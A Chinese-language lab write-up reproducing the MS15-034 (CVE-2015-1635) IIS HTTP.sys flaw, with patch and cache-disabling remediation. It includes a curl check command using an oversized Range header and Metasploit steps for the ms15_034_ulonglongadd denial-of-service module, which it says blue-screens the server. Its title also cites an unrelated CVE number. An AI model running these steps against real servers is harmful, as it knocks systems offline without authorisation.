CVE-2015-1635（MS15-034 ） 远程代码执行漏洞复现、验证和修复（cve-2014-3625）

CVE-2015-1635（MS15-034 ） 远程代码执行漏洞复现、验证和修复（cve-2014-3625）

一、          测试环境

ip: 192.168.80.200

操作系统：win2012

中间件：IIS8.5

二、          漏洞背景

漏洞详细参考如下信息：

​​https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034​​

三、          验证

在验证机机发送如下代码：

curl -v 192.168.80.200  -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

报HTTP Error 416. The requested range is not satisfiable状态码，证明此处存在此漏洞。

四、          验证机利用

工具用Metasploit(MSF)。

1.        利用search ms15-034命令搜索MFS模块

两个模块

0 ddos验证机

1 读取内存信息

2.        使用use auxiliary/dos/http/ms15_034_ulonglongadd调用模块0

3.        使用SET设置参数

如果是默认，直接run，服务器会瞬间蓝屏，然后重启，如果是改成set therads 10，服务器会长时间蓝屏。

4.        使用RUN 运行

五、          结果

六、          防御措施

1.打补丁

​​https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034​​

2.临时禁用IIS内核缓存

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。